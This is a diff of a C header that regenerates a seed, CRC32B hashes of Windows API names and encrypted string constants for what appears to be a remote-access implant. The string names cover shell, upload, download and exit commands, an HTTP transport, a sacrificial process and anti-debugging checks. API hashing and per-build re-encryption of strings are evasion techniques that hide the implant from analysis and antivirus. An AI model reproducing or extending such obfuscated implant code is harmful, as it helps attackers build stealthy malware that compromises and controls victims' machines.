@@ -1,66 +1,67 @@
-#define SEED 3434293888
-#define CheckRemoteDebuggerPresent_CRC32B 0x695a0a64
-#define CreateFileW_CRC32B 0xb8c468eb
-#define DeviceIoControl_CRC32B 0x9b1ddcfc
-#define GetAdaptersInfo_CRC32B 0x3edf1654
-#define GetComputerNameExA_CRC32B 0xbee2b569
-#define GetCurrentProcessId_CRC32B 0x3f1a9198
-#define GetModuleFileNameA_CRC32B 0x4e2963d7
-#define GetNativeSystemInfo_CRC32B 0x221add33
-#define GetSystemInfo_CRC32B 0x3f682989
-#define GetUserNameA_CRC32B 0xbb83503c
-#define GlobalMemoryStatusEx_CRC32B 0x12e4676d
-#define IsDebuggerPresent_CRC32B 0x21391d55
-#define K32GetModuleInformation_CRC32B 0xf6f17c11
-#define LocalAlloc_CRC32B 0xee8a05cb
-#define LdrLoadDll_CRC32B 0x5df73f07
-#define LdrUnloadDll_CRC32B 0x9ac9b639
-#define NtAllocateVirtualMemory_CRC32B 0x9de6f516
-#define NtClose_CRC32B 0xd37ecb5f
-#define NtCreateFile_CRC32B 0x1c2154ae
-#define NtCreateProcessEx_CRC32B 0x30f2baba
-#define NtCreateSection_CRC32B 0x103ffa82
-#define NtCreateUserProcess_CRC32B 0xadbc95e0
-#define NtFreeVirtualMemory_CRC32B 0xe251780f
-#define NtOpenFile_CRC32B 0x1ad608ec
-#define NtProtectVirtualMemory_CRC32B 0x1d8eef92
-#define NtQueryInformationFile_CRC32B 0xe232811e
-#define NtReadFile_CRC32B 0xc752ee
-#define NtReadVirtualMemory_CRC32B 0x8f18415
-#define NtTerminateProcess_CRC32B 0x856a9ca4
-#define NtWriteFile_CRC32B 0xa6482ad
-#define ReadFile_CRC32B 0xf54fb6b2
-#define RtlAllocateHeap_CRC32B 0xeb39178e
-#define RtlCreateProcessParametersEx_CRC32B 0x3d7191aa
-#define RtlDestroyProcessParameters_CRC32B 0xc897835a
-#define RtlFreeHeap_CRC32B 0xc18ad0d9
-#define RtlGetProcessHeaps_CRC32B 0xccba2de9
-#define RtlGetVersion_CRC32B 0x11a8b4b4
-#define RtlInitUnicodeString_CRC32B 0x3ccb86d
-#define RtlRandomEx_CRC32B 0x539b2baf
-#define VirtualAlloc_CRC32B 0x6fc63ccc
-#define VirtualProtect_CRC32B 0x2bbb65
-#define WinHttpCloseHandle_CRC32B 0xb54613a1
-#define WinHttpConnect_CRC32B 0xf84cb230
-#define WinHttpOpen_CRC32B 0x6f7923f
-#define WinHttpOpenRequest_CRC32B 0xde6a7d3b
-#define WinHttpReadData_CRC32B 0xc4e7e6fa
-#define WinHttpReceiveResponse_CRC32B 0x52345894
-#define WinHttpSendRequest_CRC32B 0xdf200401
-#define WinHttpSetOption_CRC32B 0x86b86750
-#define S_XK {0x4b, 0x5a,0x0}
-#define S_INSTANCE_NOT_CONNECTED {0x11, 0x1a, 0x1c, 0x17, 0x15, 0x1a, 0x14, 0x1f, 0xb5, 0x9a, 0x12, 0x17, 0x35, 0x9c, 0x92, 0x1a, 0x12, 0x9f, 0x94, 0x17, 0x17, 0x1f, 0x35, 0x2d}
-#define S_COMMAND_NOT_FOUND {0x14, 0x1a, 0x93, 0x1b, 0x95, 0x1a, 0x17, 0xbd, 0x12, 0x9a, 0x9f, 0xbd, 0x16, 0x9a, 0x9f, 0x1a, 0x17, 0xad}
-#define S_IS_COMMAND_NO_JOB {0x11, 0x14, 0xb5, 0x9c, 0x92, 0x1b, 0x93, 0x1d, 0x92, 0x9f, 0x35, 0x9a, 0x12, 0x3d, 0x10, 0x9a, 0x94, 0xad}
-#define S_TRANSPORT_FAILED {0x9f, 0x94, 0x15, 0x1a, 0x1c, 0x15, 0x12, 0x14, 0x1f, 0xbd, 0x16, 0x9d, 0x91, 0x1b, 0x17, 0x1f, 0x25}
-#define S_COMMAND_SHELL {0x14, 0x1a, 0x93, 0x1b, 0x95, 0x1a, 0x17, 0xbd, 0x1c, 0x19, 0x17, 0x1b, 0x13, 0xad}
-#define S_COMMAND_UPLOAD {0x94, 0x1a, 0x93, 0x1b, 0x95, 0x1a, 0x17, 0xbd, 0x1f, 0x15, 0x13, 0x9a, 0x95, 0x1f, 0x25}
-#define S_COMMAND_DOWNLOAD {0x94, 0x1a, 0x93, 0x1b, 0x95, 0x1a, 0x17, 0xbd, 0x17, 0x9a, 0x9e, 0x1a, 0x13, 0x9a, 0x95, 0x1f, 0x25}
-#define S_COMMAND_EXIT {0x94, 0x1a, 0x93, 0x1b, 0x95, 0x1a, 0x17, 0xbd, 0x17, 0x11, 0x11, 0x17, 0x25}
-#define S_NTDLL {0x12, 0x97, 0x17, 0x9b, 0x13, 0xba, 0x17, 0x9b, 0x13, 0xad}
-#define S_WINHTTP {0x1e, 0x19, 0x92, 0x99, 0x1f, 0x97, 0x1d, 0xba, 0x17, 0x9b, 0x13, 0xad}
-#define S_KERNEL32 {0x90, 0x1f, 0x9c, 0x9a, 0x17, 0x1b, 0x3c, 0x34, 0x32, 0x9f, 0x13, 0x9b, 0x25}
-#define S_ADVAPI32 {0x95, 0x1f, 0x1e, 0x9d, 0x9d, 0x99, 0xbc, 0x34, 0x32, 0x9f, 0x13, 0x9b, 0x25}
-#define S_IPHLPAPI {0x91, 0x15, 0x11, 0x9b, 0x1d, 0x9d, 0x9d, 0x99, 0xb2, 0x9f, 0x13, 0x9b, 0x25}
-#define S_SACR_PROC {0x04, 0x30, 0x0b, 0x86, 0x91, 0x1a, 0x17, 0x9a, 0x9e, 0x14, 0x8b, 0x84, 0x99, 0x14, 0x9f, 0x9f, 0x93, 0x34, 0xbc, 0x83, 0x1d, 0x94, 0x11, 0x1a, 0x1f, 0xba, 0x17, 0x11, 0x17, 0x2d}
-#define S_MARKER_MASK {0x99, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x19, 0x91, 0x25}
+#define SEED 1347753198
+#define CheckRemoteDebuggerPresent_CRC32B 0xe392fa43
+#define CreateFileW_CRC32B 0xd2d6cfd5
+#define DeviceIoControl_CRC32B 0xb5696dbc
+#define GetAdaptersInfo_CRC32B 0xf7cba3b5
+#define GetComputerNameExA_CRC32B 0xb9b23e2c
+#define GetCurrentProcessId_CRC32B 0xff928b96
+#define GetModuleFileNameA_CRC32B 0xdaa30838
+#define GetNativeSystemInfo_CRC32B 0xc2c59211
+#define GetSystemInfo_CRC32B 0xdb96c465
+#define GetUserNameA_CRC32B 0xc343c2a9
+#define GlobalMemoryStatusEx_CRC32B 0x96f7d353
+#define IsDebuggerPresent_CRC32B 0xf004bce8
+#define K32GetModuleInformation_CRC32B 0xc01507e9
+#define LocalAlloc_CRC32B 0xec942d0a
+#define LdrLoadDll_CRC32B 0xe7a82910
+#define LdrUnloadDll_CRC32B 0xa8da8ce0
+#define NtAllocateVirtualMemory_CRC32B 0xeecfb6ad
+#define NtClose_CRC32B 0xd562043d
+#define NtCreateFile_CRC32B 0xf8620d31
+#define NtCreateProcessEx_CRC32B 0xd784a413
+#define NtCreateSection_CRC32B 0xc5257eb2
+#define NtCreateUserProcess_CRC32B 0xebe8fbb6
+#define NtFreeVirtualMemory_CRC32B 0x9b0f6b4a
+#define NtOpenFile_CRC32B 0xe78b3757
+#define NtProtectVirtualMemory_CRC32B 0xb5155817
+#define NtQueryInformationFile_CRC32B 0xf119c005
+#define NtReadFile_CRC32B 0x97b290f0
+#define NtReadVirtualMemory_CRC32B 0xbd5b3cb4
+#define NtTerminateProcess_CRC32B 0xf6f418c1
+#define NtWriteFile_CRC32B 0xf3ec160b
+#define ReadFile_CRC32B 0xf64381a7
+#define RtlAllocateHeap_CRC32B 0xa664b9d2
+#define RtlCreateProcessParametersEx_CRC32B 0xdb21652b
+#define RtlDestroyProcessParameters_CRC32B 0xad60ae9b
+#define RtlFreeHeap_CRC32B 0xb1a666a8
+#define RtlGetProcessHeaps_CRC32B 0xeba5f523
+#define RtlGetVersion_CRC32B 0xc4287fb1
+#define RtlInitUnicodeString_CRC32B 0xb0ee2ad6
+#define RtlRandomEx_CRC32B 0x94978329
+#define VirtualAlloc_CRC32B 0xf5f01a1f
+#define VirtualProtect_CRC32B 0x9424158e
+#define WinHttpCloseHandle_CRC32B 0x8878721d
+#define WinHttpConnect_CRC32B 0x836ee81f
+#define WinHttpOpen_CRC32B 0xc3004973
+#define WinHttpOpenRequest_CRC32B 0xb20e8b99
+#define WinHttpReadData_CRC32B 0xaadbd5f6
+#define WinHttpReceiveResponse_CRC32B 0x85b6d4f0
+#define WinHttpSendRequest_CRC32B 0xd96d9568
+#define WinHttpSetOption_CRC32B 0xf62c35c0
+#define S_XK {0x55, 0x75,0x0}
+#define S_INSTANCE_NOT_CONNECTED {0x9e, 0x0d, 0x93, 0x00, 0x9a, 0x0d, 0x9b, 0x08, 0x3a, 0x8d, 0x9d, 0x00, 0xba, 0x8b, 0x1d, 0x0d, 0x9d, 0x88, 0x1b, 0x00, 0x98, 0x08, 0xba, 0x3a}
+#define S_COMMAND_NOT_FOUND {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x9d, 0x8d, 0x10, 0xaa, 0x99, 0x8d, 0x10, 0x0d, 0x98, 0xba}
+#define S_IS_COMMAND_NO_JOB {0x9e, 0x03, 0x3a, 0x8b, 0x1d, 0x0c, 0x1c, 0x0a, 0x1d, 0x88, 0xba, 0x8d, 0x9d, 0x2a, 0x9f, 0x8d, 0x1b, 0xba}
+#define S_TRANSPORT_FAILED {0x90, 0x83, 0x9a, 0x0d, 0x93, 0x02, 0x9d, 0x03, 0x90, 0xaa, 0x99, 0x8a, 0x1e, 0x0c, 0x98, 0x08, 0xaa}
+#define S_COMMAND_SHELL {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x93, 0x0e, 0x98, 0x0c, 0x9c, 0xba}
+#define S_COMMAND_UPLOAD {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x90, 0x02, 0x9c, 0x8d, 0x1a, 0x08, 0xaa}
+#define S_COMMAND_DOWNLOAD {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x98, 0x8d, 0x11, 0x0d, 0x9c, 0x8d, 0x1a, 0x08, 0xaa}
+#define S_COMMAND_EXIT {0x9b, 0x0d, 0x1c, 0x0c, 0x1a, 0x0d, 0x98, 0xaa, 0x98, 0x06, 0x9e, 0x00, 0xaa}
+#define S_NTDLL {0x9d, 0x80, 0x98, 0x8c, 0x9c, 0xad, 0x98, 0x8c, 0x9c, 0xba}
+#define S_WINHTTP {0x91, 0x0e, 0x1d, 0x8e, 0x90, 0x80, 0x92, 0xad, 0x98, 0x8c, 0x9c, 0xba}
+#define S_KERNEL32 {0x9f, 0x08, 0x13, 0x8d, 0x98, 0x0c, 0xb3, 0x23, 0xbd, 0x88, 0x9c, 0x8c, 0xaa}
+#define S_ADVAPI32 {0x9a, 0x08, 0x91, 0x8a, 0x12, 0x8e, 0x33, 0x23, 0xbd, 0x88, 0x9c, 0x8c, 0xaa}
+#define S_IPHLPAPI {0x9e, 0x02, 0x9e, 0x8c, 0x92, 0x8a, 0x12, 0x8e, 0x3d, 0x88, 0x9c, 0x8c, 0xaa}
+#define S_SACR_PROC {0x8b, 0x27, 0x84, 0x91, 0x1e, 0x0d, 0x98, 0x8d, 0x11, 0x03, 0x04, 0x93, 0x16, 0x03, 0x10, 0x88, 0x1c, 0x23, 0x33, 0x94, 0x92, 0x83, 0x9e, 0x0d, 0x90, 0xad, 0x98, 0x06, 0x98, 0x3a}
+#define S_WEB_RS {0x84, 0xa5, 0x35, 0x14, 0x8b, 0x27, 0x84, 0x91, 0x1e, 0x0d, 0x98, 0x8d, 0x11, 0x03, 0x04, 0x93, 0x16, 0x03, 0x10, 0x88, 0x1c, 0x23, 0x33, 0x94, 0x81, 0x18, 0x0b, 0xad, 0x93, 0x83, 0x2a}
+#define S_MARKER_MASK {0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0x96, 0x86, 0xaa}
